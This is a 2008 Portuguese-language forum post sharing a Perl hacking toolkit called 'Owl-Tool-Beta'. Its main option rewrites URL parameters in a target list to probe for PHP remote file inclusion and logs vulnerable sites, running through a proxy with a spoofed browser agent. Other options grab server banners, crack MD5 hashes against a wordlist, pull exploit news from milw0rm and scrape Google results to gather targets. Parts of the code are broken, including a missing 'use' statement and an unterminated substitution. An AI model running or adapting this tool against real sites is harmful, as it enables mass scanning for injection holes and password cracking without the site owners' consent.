Multi Security Scan
Publicado por C00L3R_ 20/08/2008
[ Hits: 7.241 ]
Bem simples, terminei ele estes dias. Ainda irei adicionar mais funções para ficar bacana.
Ainda está em fase beta. xD
#!/usr/bin/perl #################################---> Modulos use Term::ANSIColor; use HTML::LinkExtor; use LWP::UserAgent; IO::Socket::INET; use Digest::MD5 qw(md5_hex); use warnings; #################################---> Carregando Limpa tela my $sis="$^O"; if ($sis eq MSWin32) { $cmd="cls"; } else { $cmd="clear"; } inicio: print `$cmd`; #################################---> Banner de inicio image(); my $valor=<STDIN>; chomp $valor; if ($valor eq 0) { exit; } if ($valor eq 1) { #################################---> Variavel responsavel pela CMD $cmd = "http://"; #################################---> Pegando variaveis do usuario print "qual nome do arquivo txt que contem as listas para scan,apenas o nome \? \n"; my $lista = <STDIN>; chomp $lista; print "Se nao quiser proxy coloque 0 \n"; print "Qual o proxy \? exemplo \n"; my $proxy = <STDIN>; chomp $proxy; #################################---> iniciando constructor de Agent Stealth $agent = new LWP::UserAgent; $agent->agent('Mozilla/5.0 (X11; U; Gentoo Linux amd64; en-US; rv: Gecko/20080301 Firefox/'); $agent->cookie_jar( {} ); $agent->timeout(10); ################################---> Condicao do uso do proxy if($proxy!=0) { $agent->env_proxy(); $agent->proxy("http", "http://$proxy/"); } ################################---> iniciando filtro com regex open (my $injection, "<$lista.txt")|| die "erro em abrir $lista.txt $!\n"; while (<$injection>) { if ($_ =~ s/$\=.*/=$cmd/mg) { open(LOG,">>sites.txt"); print LOG "$_"; close(LOG); } } print "pronto links separados e com CMD injetada\n"; close $injection; ################################---> iniciando Scaner de PHP-injection print "agora o scan vai procurar sites vulneraveis\n"; open (my $teste, "<sites.txt"); while (<$teste>) { my $pagina="$_"."?"; my $request = HTTP::Request->new('GET',$pagina); my $result = $agent->request($request); my $site = $agent->request($request); # $result->content(); if ($site->is_success) { if($site->content =~ /owlphp/) { open (OUT, ">>vuln.txt"); print OUT "$pagina\n"; close(OUT); }} } print "Scan-owl terminado\nabra vuln.txt para ver sites vuln\n"; close($teste); sleep 3; goto inicio; } ################################---> Host predict if ($valor eq 2) { print "qual pagina voce quer ver info \?\n"; my $pagin=<STDIN>; chomp $pagin; my $socket = IO::Socket::INET->new( PeerAddr => "$pagin", PeerPort => "80", Timeout => "7", Proto => "tcp" ); die "Nao foi possivel criar a socket\n" unless $socket; if ($socket) { print $socket "GET /index.html HTTP/1.0\r\n\r\n"; while (<$socket>) { if ($_ =~ /Date:|Server:|squid|system/){ print "$_"; } }} my $ip = inet_ntoa(inet_aton($pagin)); print "IP:$ip\n"; close($socket); sleep 8; goto inicio; } ##############################---> novidades do boteco if ($valor eq 3) { print "pegando ultimos posts do blog\n"; my $pagi=""; $agent = new LWP::UserAgent; $request = HTTP::Request->new('GET',$pagi); $result = $agent->request($request); @result = $result->content(); open(RES,">","novi.txt"); print RES @result; close(RES); open(RES,"<","novi.txt"); @texto = <RES>; close(RES); unlink ("novi.txt"); foreach (@texto) { if ($_ =~ m/<(title|link)>(.*?)<\/(title|link)>/) { my $nova="$2"; print "$nova\n"; }} sleep 8; goto inicio; } #############################---> novidades milw0rm if ($valor eq 4) { &milworm(); sleep 5; goto inicio; } #############################---> MD5 Crack if ($valor eq 5) { print "MD5 crack\n"; print "Author: evolution0x55 \n"; print "Wordlist file? "; chomp($file=<>); open(FOPEN, $file) or die($file." not found!"); print "\nMD5 Hash? "; chomp($hash=<>); print "\n"; foreach (<FOPEN>){ $line_hash=md5_hex($_); if ($line_hash eq $hash){ print "CRACKED: ".$_; exit 0; } print $_.":".$hash." [FAILED]\n"; } close(FOPEN); print "\n\nHash not cracked."; sleep 10; goto inicio; } #################################----> Googler if ($valor eq 6) { #################################---> Pegando Variaveis do usuario #unlink resposta.txt; print "Googler LinkExtor by C00L3R\n"; print "vamos la, Qual string de busca \?\n"; my $string = <STDIN>; chomp $string; print "Se nao quiser proxy coloque 0 \n"; print "Qual o proxy \? exemplo \n"; my $proxy = <STDIN>; chomp $proxy; #################################---> iniciando constructor Stealth my $agent = new LWP::UserAgent; $agent->agent('Mozilla/5.0 (X11; U; Gentoo Linux amd64; en-US; rv: Gecko/20080301 Firefox/'); $agent->cookie_jar( {} ); #################################---> Ativando Proxy if($proxy!=0) { $agent->env_proxy(); $agent->proxy("http", "http://$proxy/"); } #################################---> Loop de Busca do Google print "fazendo busca isso pode demorar minutos\n"; for(my $i=10;$i<100;$i+=2) { my $pa="$string&start=$i"; my $request = HTTP::Request->new('GET',$pa); my $result = $agent->request($request); my $resposta = $result->content(); open (OUT, ">>paginas.txt"); print OUT "$resposta\n"; close(OUT); } #################################---> Extraindo Links eval { print "paginas pegas agora extraindo os links\n"; sleep 3; my $parser = HTML::LinkExtor->new; $parser->parse_file("paginas.txt"); my @links = $parser->links; foreach (@links) { print 'Type: ', shift @$_, "\n"; while (my ($name, $val) = splice(@$_, 0, 2)) { print " $name -> $val\n"; if ($val !~ /videos.*|google.*|groups.*|image.*|www\.google.*|orkut.*|64.*|youtube.*/) { open (OUT, ">>resposta.txt"); print OUT "$val\n"; close(OUT); print "$val\n"; } } } #unlink paginas.txt; print "Scan Caos Google terminado resultado salvo em resposta.txt\n"; } } ################################--->funcoes diversas sub milworm() { @sploits = (); $version = 1.0; $getit = ''; $agent = new LWP::UserAgent; $request = HTTP::Request->new('GET',$getit); $result = $agent->request($request); $getit =~ s/.*\///; @result = $result->content(); open(RES,">","mille.txt"); print RES @result; close(RES); open(RES,"<","mille.txt"); @inhalt = <RES>; close(RES); unlink ("mille.txt"); foreach $shit (@inhalt) { $shit =~ tr/</ /; $shit =~ tr/>/ /; $shit =~ tr/\// /; $shit =~ s/; if ($shit =~ m/title/i) { $shit =~ s/title/ /ig; push(@sploits,"$shit"); } } print @sploits; } sub image { print q{ Owl-Tool-Beta ======================================================= || ... * . _ . * * || ||* . * . * (_) * || || . |* .. * .. || || . * \| * .___. .. * * || ||* \/ |/ \/(o,o) . * || || _\_\ | / /) )* _/_ * || || \ \| /,--"-"--- .. * Coded by C00l3r_ || ||_-----` |(,__,__/__/_ . * || || \ || .. * || || ||| . * || || * ||| * || || * ||| * * || ||, -=-~' .-^- _--^----.-.-.-.-^.-.-.-.-.-.-.-.-.-.- || || ` || ======================================================= -------------------------------------------------------- 0- Sair 1- Coruja php injectScan 0.1 2- Httpd type Scan 3- BotecoUnix News 4- Milw0rm News 5- MD5 crack 6- Googler LinkExtor term version 0.2 ================================================================== thanks furadordeSyS,r0t3d,b4rtb0y,_mlk_,voidpointer,st4t1c,C0lt7r my parents and relatives,my friends thanks for all ------------------------------------------------------------------ }}
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